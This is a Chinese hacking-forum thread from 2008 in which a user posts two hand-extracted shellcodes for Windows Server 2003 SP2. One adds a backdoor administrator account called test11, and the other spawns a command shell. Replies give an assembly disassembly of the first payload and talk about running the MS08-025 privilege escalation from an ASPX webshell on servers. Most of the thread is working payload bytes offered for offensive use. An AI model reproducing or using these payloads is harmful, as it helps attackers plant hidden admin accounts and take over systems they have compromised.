[原创]发两个我自已提取的shellcode
文章作者:pt007[at]vip.sina.com信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。
1、//win2003+sp2下加入一个test11/Test11!!!管理员用户的shellcode:
unsigned char shellcode[]=
"\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x24"
"\xC6\x45\xDC\x6E\xC6\x45\xDD\x65\xC6\x45\xDE\x74\xC6\x45\xDF\x20\xC6\x45\xE0\x0D\xC6\x45\xE1\x75\xC6\x45\xE2\x73\xC6\x45\xE3\x65\xC6\x45\xE4\x72\xC6\x45\xE5\x20\xC6\x45\xE6\x0D\xC6\x45\xE7\x74\xC6\x45\xE8\x65\xC6\x45\xE9\x73\xC6\x45\xEA\x74\xC6\x45\xEB\x31\xC6\x45\xEC\x31\xC6\x45\xED\x20\xC6\x45\xEE\x0D\xC6\x45\xEF\x54\xC6\x45\xF0\x65\xC6\x45\xF1\x73\xC6\x45\xF2\x74\xC6\x45\xF3\x31\xC6\x45\xF4\x31\xC6\x45\xF5\x21\xC6\x45\xF6\x21\xC6\x45\xF7\x21\xC6\x45\xF8\x20\xC6\x45\xF9\x0D\xC6\x45\xFA\x2F\xC6\x45\xFB\x61\xC6\x45\xFC\x64\xC6\x45\xFD\x64\x8D\x45\xDC\x50\xB8\x83\xA0\xB8\x77\xFF\xD0"
"\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x34"
"\xC6\x45\xCC\x6E\xC6\x45\xCD\x65\xC6\x45\xCE\x74\xC6\x45\xCF\x20\xC6\x45\xD0\x0D\xC6\x45\xD1\x6C\xC6\x45\xD2\x6F\xC6\x45\xD3\x63\xC6\x45\xD4\x61\xC6\x45\xD5\x6C\xC6\x45\xD6\x67\xC6\x45\xD7\x72\xC6\x45\xD8\x6F\xC6\x45\xD9\x75\xC6\x45\xDA\x70\xC6\x45\xDB\x20\xC6\x45\xDC\x0D\xC6\x45\xDD\x61\xC6\x45\xDE\x64\xC6\x45\xDF\x6D\xC6\x45\xE0\x69\xC6\x45\xE1\x6E\xC6\x45\xE2\x69\xC6\x45\xE3\x73\xC6\x45\xE4\x74\xC6\x45\xE5\x72\xC6\x45\xE6\x61\xC6\x45\xE7\x74\xC6\x45\xE8\x6F\xC6\x45\xE9\x72\xC6\x45\xEA\x73\xC6\x45\xEB\x20\xC6\x45\xEC\x0D\xC6\x45\xED\x74\xC6\x45\xEE\x65\xC6\x45\xEF\x73\xC6\x45\xF0\x74\xC6\x45\xF1\x31\xC6\x45\xF2\x31\xC6\x45\xF3\x20\xC6\x45\xF4\x0D\xC6\x45\xF5\x2F\xC6\x45\xF6\x61\xC6\x45\xF7\x64\xC6\x45\xF8\x64"
"\x8D\x45\xCC\x50\xB8\x83\xA0\xB8\x77\xFF\xD0";
2、/* 以下shellcode将开启一个command.com for win2k3+sp2 */
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
"\xc6\x1d\x80\x7c" //2003 sp2上LoadLibraryA地址:0x7C801DC6
"\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8"
"\x83\xa0\xb8\x77" //2003 sp1和sp2上system地址:0x77b8a083
"\xFF\xD0";
[[i] 本帖最后由 pt007 于 2008-4-29 22:00 编辑 [/i]] 是自己劳动的成果,发不发出来是一回事,是不是对每个人都有意义那是另外一回事!
如果楼主再贴上函数源代码就更好了 没有源码,我手动提取的 push 栈 然后system调用,目测是这样,嘿嘿
没用还工具转换:lol: push ebp
mov ebp, esp
xor edi, edi
push edi
sub esp, 24
mov byte ptr [ebp-24], 6E
mov byte ptr [ebp-23], 65
mov byte ptr [ebp-22], 74
mov byte ptr [ebp-21], 20
mov byte ptr [ebp-20], 0D
mov byte ptr [ebp-1F], 75
mov byte ptr [ebp-1E], 73
mov byte ptr [ebp-1D], 65
mov byte ptr [ebp-1C], 72
mov byte ptr [ebp-1B], 20
mov byte ptr [ebp-1A], 0D
mov byte ptr [ebp-19], 74
mov byte ptr [ebp-18], 65
mov byte ptr [ebp-17], 73
mov byte ptr [ebp-16], 74
mov byte ptr [ebp-15], 31
mov byte ptr [ebp-14], 31
mov byte ptr [ebp-13], 20
mov byte ptr [ebp-12], 0D
mov byte ptr [ebp-11], 54
mov byte ptr [ebp-10], 65
mov byte ptr [ebp-F], 73
mov byte ptr [ebp-E], 74
mov byte ptr [ebp-D], 31
mov byte ptr [ebp-C], 31
mov byte ptr [ebp-B], 21
mov byte ptr [ebp-A], 21
mov byte ptr [ebp-9], 21
mov byte ptr [ebp-8], 20
mov byte ptr [ebp-7], 0D
mov byte ptr [ebp-6], 2F
mov byte ptr [ebp-5], 61
mov byte ptr [ebp-4], 64
mov byte ptr [ebp-3], 64
lea eax, dword ptr [ebp-24]
push eax
mov eax, 77B8A083
call eax
硬编码...我无语了...
还有 mov...... 更无语...
call @F
db 'net user /add ..........'
@@:
用这个吧 :loveliness: 不通用,不通用。。。。 感谢楼主的共享。
不过ms08025不能用在webshell提权中。。作用大幅度地减小了。
"An attacker must have valid logon credentials and be able to log on locally to a vulnerable system in order to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users."
[[i] 本帖最后由 taiwansee 于 2008-5-2 20:23 编辑 [/i]] 08025的利用似乎需要发送消息?
所以WEBSHELL下无法使用吧 [quote]原帖由 [i]sunwear[/i] 于 2008-5-3 09:36 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=142102&ptid=32956][img]images/common/back.gif[/img][/url]
08025的利用似乎需要发送消息?
所以WEBSHELL下无法使用吧 [/quote]
可以在.net shell里面成功进行本地提权,我测试成功了三台. 不在WEBSHELL下 应该还是有方法的呀! 可以在.net shell里面成功进行本地提权,我测试成功了三台.
意思是在ASPX马里可以执行08025利用程序来添加用户? 我在Windows Server 2003 Enterprise SP2上,用aspx马测试失败。
另:
“可以在.net shell里面成功进行本地提权,我测试成功了三台.”中的“.net shell”到底是怎么样的shell呢?“本地提权”又是怎么回事?
请楼主指教。 [quote]原帖由 [i]洋洋洒洒[/i] 于 2008-5-1 23:42 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=142050&ptid=32956][img]images/common/back.gif[/img][/url]
push ebp
mov ebp, esp
xor edi, edi
push edi
sub esp, 24
mov byte ptr [ebp-24], 6E
mov byte ptr [ebp-23], 65
mov byte ptr [ebp-22], 74
mov byte ptr [eb ... [/quote]
能说说你是怎么得到ASM源码的?
回复 13楼 pt007 的帖子
直接把机器码整理一下格式 往od里贴上去就得到了...请问I.S.T.O网址在哪啊?[s:307] [quote]原帖由 [i]洋洋洒洒[/i] 于 2008-5-5 13:03 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=142213&ptid=32956][img]images/common/back.gif[/img][/url]
直接把机器码整理一下格式 往od里贴上去就得到了...
请问I.S.T.O网址在哪啊?[s:307] [/quote]
http://blog.csdn.net/I_S_T_O/ 欢迎指教:)
[[i] 本帖最后由 pt007 于 2008-5-6 11:01 编辑 [/i]]
页:
[1]